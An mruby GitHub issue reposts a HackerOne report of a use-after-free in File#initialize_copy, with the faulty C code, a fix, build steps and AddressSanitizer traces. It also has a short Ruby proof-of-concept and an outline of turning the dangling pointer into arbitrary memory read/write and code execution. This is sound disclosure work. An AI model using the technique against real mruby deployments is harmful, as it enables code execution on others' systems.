Use after free in File#initilialize_copy
clayton-shopify opened this issue · 0 comments
clayton-shopify commented
The following was reported by https://hackerone.com/pnoltof:
Root Cause:
calling File#initilialize_copy with an invalid argument, causes the function to terminate early, leaving a dangling pointer in the recievers DATA_PTR.
mrb_io_initialize_copy(mrb_state *mrb, mrb_value copy)
{
mrb_value orig;
mrb_value buf;
struct mrb_io *fptr_copy;
struct mrb_io *fptr_orig;
mrb_bool failed = TRUE;
mrb_get_args(mrb, "o", &orig);
fptr_copy = (struct mrb_io *)DATA_PTR(copy);
if (fptr_copy != NULL) {
fptr_finalize(mrb, fptr_copy, FALSE);
mrb_free(mrb, fptr_copy);
}
fptr_copy = (struct mrb_io *)mrb_io_alloc(mrb);
fptr_orig = io_get_open_fptr(mrb, orig); #can raise exception
DATA_TYPE(copy) = &mrb_io_type;
DATA_PTR(copy) = fptr_copy;
[....]
}
Details & Impact
initialize_copy first frees the DATA_PTR(self), then it gets the data pointer for the first argument. This operation can raise an exception, in which case DATA_PTR(self) remains dangeling. By proper heap feng shui, one can allocate another value (such as string) in the same spot. Calling a.close() will set DATA_PTR(a)->fd = -1, effectively setting some memory to 0xffffffff. This can be used to change the size of a string object. The corrupted string can then be used to read/write memory. This can be used to obtain arbitrary code execution.
a = File.new(0)
#needs proper heap massaging for reallocation
a.initialize_copy(0) # DATA_PTR(a) is now pointing to free'd memory
#allocate string at old position
str = "foo".gsub("o","asdfasdf")
a.close() #overwrites offset 0 on DATA_PTR(a) with ffffffff
#str length is now 0xfffffffff, we can read/write arbitrary memoryBugfix
Move fptr_orig = io_get_open_fptr(mrb, orig); to the top of the function (next to mrb_get_args(mrb, "o", &orig);).
Steps to Reproduce
obtain current mruby version
git clone https://github.com/mruby/mruby.git
git checkout fabc460880fbabd18369a
CC=clang CFLAGS="-fsanitize=address -fsanitize-recover=address -ggdb -O0" LDFLAGS="-fsanitize=address" LD=clang make
run testcase
$ ASAN_OPTIONS=halt_on_error=false:allow_addr2line=true:allocator_may_return_null=1 ./bin/mruby ../uaf_file.rb
trace (most recent call last):
[0] ../uaf_file.rb:3
../uaf_file.rb:3: wrong argument type Fixnum (expected Data) (TypeError)
=================================================================
==9006==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000019890 at pc 0x0000006ed5ce bp 0x7ffd43f26b10 sp 0x7ffd43f26b08
READ of size 4 at 0x602000019890 thread T0
#0 0x6ed5cd in fptr_finalize /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:650
SUMMARY: AddressSanitizer: heap-use-after-free /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:650 in fptr_finalize
Shadow bytes around the buggy address:
0x0c047fffb2c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
=>0x0c047fffb310: fa fa[fd]fd fa fa 00 07 fa fa 00 fa fa fa 00 00
0x0c047fffb320: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fffb330: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fffb340: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fffb350: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 00
0x0c047fffb360: fa fa 00 02 fa fa 00 fa fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
[...] #various reads
=================================================================
==9006==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000019890 at pc 0x0000006ed77f bp 0x7ffd43f26b10 sp 0x7ffd43f26b08
WRITE of size 4 at 0x602000019890 thread T0
#0 0x6ed77e in fptr_finalize /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:664
#1 0x6e7a14 in mrb_io_free /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:260
#2 0x5e4f4f in obj_free /home/me/grammarfuzz/mruby/src/gc.c:841
#3 0x5e43e1 in free_heap /home/me/grammarfuzz/mruby/src/gc.c:391
#4 0x5e4ffc in mrb_gc_destroy /home/me/grammarfuzz/mruby/src/gc.c:400
#5 0x537203 in mrb_close /home/me/grammarfuzz/mruby/src/state.c:263
#6 0x4eda6a in cleanup /home/me/grammarfuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:165
#7 0x4ec79d in main /home/me/grammarfuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:251
#8 0x7ff9e25d282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#9 0x419a18 in _start (/home/me/grammarfuzz/mruby/bin/mruby+0x419a18)
0x602000019890 is located 0 bytes inside of 16-byte region [0x602000019890,0x6020000198a0)
freed by thread T0 here:
#0 0x4b99c0 in __interceptor_cfree.localalias.0 asan_malloc_linux.cc.o
#1 0x53501b in mrb_default_allocf /home/me/grammarfuzz/mruby/src/state.c:51
#2 0x5e3ce7 in mrb_free /home/me/grammarfuzz/mruby/src/gc.c:274
#3 0x6ec52f in mrb_io_initialize_copy /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:567
#4 0x50ac0a in mrb_vm_exec /home/me/grammarfuzz/mruby/src/vm.c:1469
#5 0x4feea1 in mrb_vm_run /home/me/grammarfuzz/mruby/src/vm.c:947
#6 0x533449 in mrb_top_run /home/me/grammarfuzz/mruby/src/vm.c:3002
#7 0x652ea3 in mrb_load_exec /home/me/grammarfuzz/mruby/mrbgems/mruby-compiler/core/parse.y:5835
#8 0x653b05 in mrb_load_file_cxt /home/me/grammarfuzz/mruby/mrbgems/mruby-compiler/core/parse.y:5844
#9 0x4ec267 in main /home/me/grammarfuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:227
#10 0x7ff9e25d282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 here:
#0 0x4b9ec8 in realloc (/home/me/grammarfuzz/mruby/bin/mruby+0x4b9ec8)
#1 0x535035 in mrb_default_allocf /home/me/grammarfuzz/mruby/src/state.c:55
#2 0x5e2b16 in mrb_realloc_simple /home/me/grammarfuzz/mruby/src/gc.c:206
#3 0x5e31f4 in mrb_realloc /home/me/grammarfuzz/mruby/src/gc.c:220
#4 0x5e3b83 in mrb_malloc /home/me/grammarfuzz/mruby/src/gc.c:242
#5 0x6ebf6e in mrb_io_alloc /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:270
#6 0x6eeb57 in mrb_io_initialize /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:629
#7 0x510a2d in mrb_vm_exec /home/me/grammarfuzz/mruby/src/vm.c:1675
#8 0x4feea1 in mrb_vm_run /home/me/grammarfuzz/mruby/src/vm.c:947
#9 0x4f661f in mrb_run /home/me/grammarfuzz/mruby/src/vm.c:2988
#10 0x4f43d9 in mrb_funcall_with_block /home/me/grammarfuzz/mruby/src/vm.c:505
#11 0x6949ad in mrb_instance_new /home/me/grammarfuzz/mruby/src/class.c:1595
#12 0x50ac0a in mrb_vm_exec /home/me/grammarfuzz/mruby/src/vm.c:1469
#13 0x4feea1 in mrb_vm_run /home/me/grammarfuzz/mruby/src/vm.c:947
#14 0x533449 in mrb_top_run /home/me/grammarfuzz/mruby/src/vm.c:3002
#15 0x652ea3 in mrb_load_exec /home/me/grammarfuzz/mruby/mrbgems/mruby-compiler/core/parse.y:5835
#16 0x653b05 in mrb_load_file_cxt /home/me/grammarfuzz/mruby/mrbgems/mruby-compiler/core/parse.y:5844
#17 0x4ec267 in main /home/me/grammarfuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:227
#18 0x7ff9e25d282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-use-after-free /home/me/grammarfuzz/mruby/mrbgems/mruby-io/src/io.c:664 in fptr_finalize
Shadow bytes around the buggy address:
0x0c047fffb2c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fffb300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
=>0x0c047fffb310: fa fa[fd]fd fa fa 00 07 fa fa 00 fa fa fa 00 00
0x0c047fffb320: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fffb330: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fffb340: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fffb350: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 00
0x0c047fffb360: fa fa 00 02 fa fa 00 fa fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
=================================================================
==9006==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000019894 at pc 0x0000006ed7ea bp 0x7ffd43f26b10 sp 0x7ffd43f26b08
READ of size 4 at 0x602000019894 thread T0
[....]
Authors:
Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera